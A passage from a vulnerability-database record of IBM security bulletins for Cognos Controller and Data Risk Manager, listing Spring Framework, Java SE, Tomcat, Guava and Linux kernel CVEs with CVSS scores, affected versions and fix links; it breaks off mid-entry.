(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-11039](<https://vulners.com/cve/CVE-2018-11039>) \n** DESCRIPTION: **Pivotal Spring Framework is vulnerable to cross-site tracing, caused by a flaw in the HiddenHttpMethodFilter in Spring MVC. By persuading a victim to visit a specially-crafted Web site, an attacker could exploit this vulnerability to cause the victim's browser to invoke a TRACE request to return sensitive header information including cookies or authentication data from third-party domains. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/145412](<https://exchange.xforce.ibmcloud.com/vulnerabilities/145412>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-11040](<https://vulners.com/cve/CVE-2018-11040>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to bypass security restrictions, caused by a flaw in AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView. By sending a specially-crafted request, an attacker could exploit this vulnerability to perform cross-domain requests. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/145413](<https://exchange.xforce.ibmcloud.com/vulnerabilities/145413>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2018-1199](<https://vulners.com/cve/CVE-2018-1199>) \n** DESCRIPTION: **Pivotal Spring Security and Spring Framework could allow a remote attacker to bypass security restrictions, caused by the failure to consider URL path parameters when processing security constraints. By adding a URL path parameter with special encodings, an attacker could exploit this vulnerability to bypass access restrictions and gain access to the server and obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/138601](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138601>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-1257](<https://vulners.com/cve/CVE-2018-1257>) \n** DESCRIPTION: **Pivotal Spring Framework is vulnerable to a denial of service. By sending a specially-crafted message, a remote attacker could exploit this vulnerability to perform a regular expression denial of service attack. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/143316](<https://exchange.xforce.ibmcloud.com/vulnerabilities/143316>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2018-1270](<https://vulners.com/cve/CVE-2018-1270>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the exposure of STOMP over WebSocket endpoints with a STOMP broker through the spring-messaging module. By sending a specially-crafted message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141284](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141284>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-1271](<https://vulners.com/cve/CVE-2018-1271>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to traverse directories on the system, caused by improper validation of user request. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to configure Spring MVC to serve static resources. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141285](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141285>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2018-1272](<https://vulners.com/cve/CVE-2018-1272>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote authenticated attacker to gain elevated privileges on the system, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to gain elevated privileges. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141286](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141286>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2018-1275](<https://vulners.com/cve/CVE-2018-1275>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the exposure of STOMP over WebSocket endpoints with a STOMP broker through the spring-messaging module. By sending a specially-crafted message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141565](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141565>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-11272](<https://vulners.com/cve/CVE-2019-11272>) \n** DESCRIPTION: **Pivotal Spring Security could allow a remote attacker to bypass security restrictions, caused by a flaw in the PlaintextPasswordEncoder function. By using a password of \"null\", an attacker could exploit this vulnerability to bypass access restrictions. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/166568](<https://exchange.xforce.ibmcloud.com/vulnerabilities/166568>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2019-3795](<https://vulners.com/cve/CVE-2019-3795>) \n** DESCRIPTION: **Pivotal Spring Security could provide weaker than expected security, caused by an insecure randomness flaw when using SecureRandomFactoryBean#setSeed to configure a SecureRandom instance. A remote attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/159543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/159543>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N) \n \n** CVEID: **[CVE-2020-5408](<https://vulners.com/cve/CVE-2020-5408>) \n** DESCRIPTION: **VMware Tanzu Spring Security could allow a remote attacker to obtain sensitive information, caused by the use of a fixed null initialization vector with CBC Mode. By using dictionary attack techniques, an attacker could exploit this vulnerability to obtain sensitive information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/181969](<https://exchange.xforce.ibmcloud.com/vulnerabilities/181969>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2021-22112](<https://vulners.com/cve/CVE-2021-22112>) \n** DESCRIPTION: **Jenkins weekly could allow a remote authenticated attacker to gain elevated privileges on the system, caused by a flaw in user session. By sending a specially-crafted request, an authenticated attacker could exploit this vulnerability to gain elevated privileges as SYSTEM. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197071](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197071>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-2388](<https://vulners.com/cve/CVE-2021-2388>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to take control of the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205815](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205815>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-2369](<https://vulners.com/cve/CVE-2021-2369>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Library component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205796](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205796>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-2432](<https://vulners.com/cve/CVE-2021-2432>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the JNDI component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205856](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205856>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-21496](<https://vulners.com/cve/CVE-2022-21496>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the JNDI component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224777](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224777>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-21434](<https://vulners.com/cve/CVE-2022-21434>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224718](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224718>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-21443](<https://vulners.com/cve/CVE-2022-21443>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224726](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224726>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-39038](<https://vulners.com/cve/CVE-2021-39038>) \n** DESCRIPTION: **IBM WebSphere Application Server 9.0 and IBM WebSphere Application Server Liberty 17.0.0.3 through 22.0.0.2 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 213968. \nCVSS Base score: 4.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/213968](<https://exchange.xforce.ibmcloud.com/vulnerabilities/213968>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N) \n \n** IBM X-Force ID: **220575 \n** DESCRIPTION: **Spring Framework could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization in the SerializableTypeWrapper class. By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/220575 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220575>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s) \n** \n---|--- \nIBM Cognos Controller| 10.4.2 \nIBM Cognos Controller| 10.4.1 \nIBM Cognos Controller| 10.4.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading.\n\n**Product(s)**| **Versions() \n**| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Cognos Controller| 10.4.2| [Download IBM Cognos Controller 10.4.2 FP2 from Fix Central](<https://www.ibm.com/support/pages/node/6608092> \"IBM Cognos Controller 10.4.2 FP2\" ) \nIBM Cognos Controller| 10.4.1| \n\n[Download IBM Cognos Controller 10.4.1 IF15 from Fix Central](<https://www.ibm.com/support/pages/node/6831325> \"IBM Cognos Controller 10.4.1 IF15 \$add URL prior to publish\$\" ) \n \nIBM Cognos Controller| 10.4.0| \n\n[Download IBM Cognos Controller 10.4.2 FP2 from Fix Central](<https://www.ibm.com/support/pages/node/6608092> \"IBM Cognos Controller 10.4.2 FP2\" ) \n \n**IBM Cognos Controller Cloud**\n\nRemediation for IBM Cognos Controller 10.4.2 Cloud environments has completed and no further action is required.\n\nRemediation for IBM Cognos Controller 10.4.1 Cloud environments will be completed during the next scheduled maintenance weekend.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-02T19:43:36", "type": "ibm", "title": "Security Bulletin: IBM Cognos Controller has addressed multiple vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000027", "CVE-2016-9878", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-1199", "CVE-2018-1257", "CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-1275", "CVE-2018-25031", "CVE-2019-11272", "CVE-2019-3795", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-5408", "CVE-2020-5421", "CVE-2020-7656", "CVE-2021-22060", "CVE-2021-22096", "CVE-2021-22112", "CVE-2021-2369", "CVE-2021-2388", "CVE-2021-2432", "CVE-2021-35517", "CVE-2021-35556", "CVE-2021-35559", "CVE-2021-35560", "CVE-2021-35561", "CVE-2021-35564", "CVE-2021-35565", "CVE-2021-35578", "CVE-2021-35586", "CVE-2021-35588", "CVE-2021-35603", "CVE-2021-36090", "CVE-2021-39031", "CVE-2021-39038", "CVE-2021-41035", "CVE-2021-46708", "CVE-2022-21248", "CVE-2022-21291", "CVE-2022-21293", "CVE-2022-21294", "CVE-2022-21305", "CVE-2022-21340", "CVE-2022-21341", "CVE-2022-21349", "CVE-2022-21360", "CVE-2022-21365", "CVE-2022-21434", "CVE-2022-21443", "CVE-2022-21496", "CVE-2022-22475", "CVE-2022-22950", "CVE-2022-22965"], "modified": "2022-12-02T19:43:36", "id": "2BE1B762E9F077419A696E0C1B88E2D3F236BE3549BFC2182468480E071BF032", "href": "https://www.ibm.com/support/pages/node/6841803", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-08T10:16:11", "description": "## Summary\n\nIBM Data Risk Manager (IDRM) is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. This fix includes Spring Boot 2.6.6 and Spring Framework 5.3.18, and addresses multiple vulnerabilities with an updated version of IDRM 2.0.6.13. Please see the remediation steps below to apply the fix. All customers are encouraged to act quickly to update their systems.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22942](<https://vulners.com/cve/CVE-2022-22942>) \n** DESCRIPTION: **Linux Kernel could allow a local authenticated attacker to obtain sensitive information, caused by improper file descriptor handling in the vmwgfx driver. By sending a specially-crafted ioctl call, an attacker could exploit this vulnerability to gain access to files opened by other processes on the system, and use this information to launch further attacks against the affected system. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/218323](<https://exchange.xforce.ibmcloud.com/vulnerabilities/218323>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2021-4155](<https://vulners.com/cve/CVE-2021-4155>) \n** DESCRIPTION: **Linux Kernel could allow a local authenticated attacker to obtain sensitive information, caused by data leak flaw in the way how XFS_IOC_ALLOCSP IOCTL in the XFS filesystem is allowed for size increase of files with unaligned size. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information on the XFS filesystem, and use this information to launch further attacks against the affected system. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216919](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216919>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2022-23181](<https://vulners.com/cve/CVE-2022-23181>) \n** DESCRIPTION: **Apache Tomcat could allow a local authenticated attacker to gain elevated privileges on the system, caused by a time of check, time of use flaw when configured to persist sessions using the FileStore. By sending a specially-crafted request, an authenticated attacker could exploit this vulnerability to perform actions with the privileges of Tomcat process. \nCVSS Base score: 7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/218221](<https://exchange.xforce.ibmcloud.com/vulnerabilities/218221>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-35550](<https://vulners.com/cve/CVE-2021-35550>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the JSSE component could allow an unauthenticated attacker to obtain sensitive information resulting in a high confidentiality impact using unknown attack vectors. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211627](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211627>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2016-6796](<https://vulners.com/cve/CVE-2016-6796>) \n** DESCRIPTION: **Apache Tomcat could allow a local attacker to bypass security restrictions. By modifying configuration parameters for the JSP Servlet, an attacker could exploit this vulnerability to bypass a configured SecurityManager. \nCVSS Base score: 4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/118404](<https://exchange.xforce.ibmcloud.com/vulnerabilities/118404>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-3573](<https://vulners.com/cve/CVE-2021-3573>) \n** DESCRIPTION: **Linux Kernel is vulnerable to a denial of service, caused by a use-after-free flaw in the hci_sock_bound_ioctl function. By sending a specially-crafted request, a local attacker could exploit this vulnerability to cause the kernel to crash. \nCVSS Base score: 6.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/203249](<https://exchange.xforce.ibmcloud.com/vulnerabilities/203249>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-22096](<https://vulners.com/cve/CVE-2021-22096>) \n** DESCRIPTION: **VMware Spring Framework could allow a remote attacker to bypass security restrictions. By sending a specially-crafted input, an attacker could exploit this vulnerability to cause the insertion of additional log entries. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212430](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212430>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2016-1000027](<https://vulners.com/cve/CVE-2016-1000027>) \n** DESCRIPTION: **Pivota Spring Framework could allow a remote authenticated attacker to execute arbitrary code on the system, caused by a code injection vulnerability. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 6.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/174367](<https://exchange.xforce.ibmcloud.com/vulnerabilities/174367>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2021-22118](<https://vulners.com/cve/CVE-2021-22118>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a local authenticated attacker to gain elevated privileges on the system, caused by a flaw in the WebFlux application. By sending a specially-crafted request, an authenticated attacker could exploit this vulnerability to gain elevated privileges to read or modify files in the WebFlux application, or overwrite arbitrary files with multipart request data. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202705](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202705>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L) \n \n** CVEID: **[CVE-2020-5421](<https://vulners.com/cve/CVE-2020-5421>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote attacker to bypass security restrictions, caused by improper input validation. By using a specially-crafted jsessionid path parameter, an attacker could exploit this vulnerability to bypass RFD Protection. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188530](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188530>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2018-10237](<https://vulners.com/cve/CVE-2018-10237>) \n** DESCRIPTION: **Google Guava is vulnerable to a denial of service, caused by improper eager allocation checks in the AtomicDoubleArray and CompoundOrdering class. By sending a specially-crafted data, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/142508](<https://exchange.xforce.ibmcloud.com/vulnerabilities/142508>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-8908](<https://vulners.com/cve/CVE-2020-8908>) \n** DESCRIPTION: **Guava could allow a remote authenticated attacker to bypass security restrictions, caused by a temp directory creation vulnerability in com.google.common.io.Files.createTempDir(). By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass access restrictions. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192996](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192996>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2022-21365](<https://vulners.com/cve/CVE-2022-21365>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the ImageIO component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217659](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217659>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21360](<https://vulners.com/cve/CVE-2022-21360>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the ImageIO component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217654>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21349](<https://vulners.com/cve/CVE-2022-21349>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the 2D component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217643](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217643>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21341](<https://vulners.com/cve/CVE-2022-21341>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Serialization component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217636](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217636>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21340](<https://vulners.com/cve/CVE-2022-21340>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217635](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217635>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21305](<https://vulners.com/cve/CVE-2022-21305>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217600](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217600>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-21294](<https://vulners.com/cve/CVE-2022-21294>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217589](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217589>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21293](<https://vulners.com/cve/CVE-2022-21293>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217588](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217588>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21291](<https://vulners.com/cve/CVE-2022-21291>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217586](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217586>) for the current score. \nCVSS Vector: 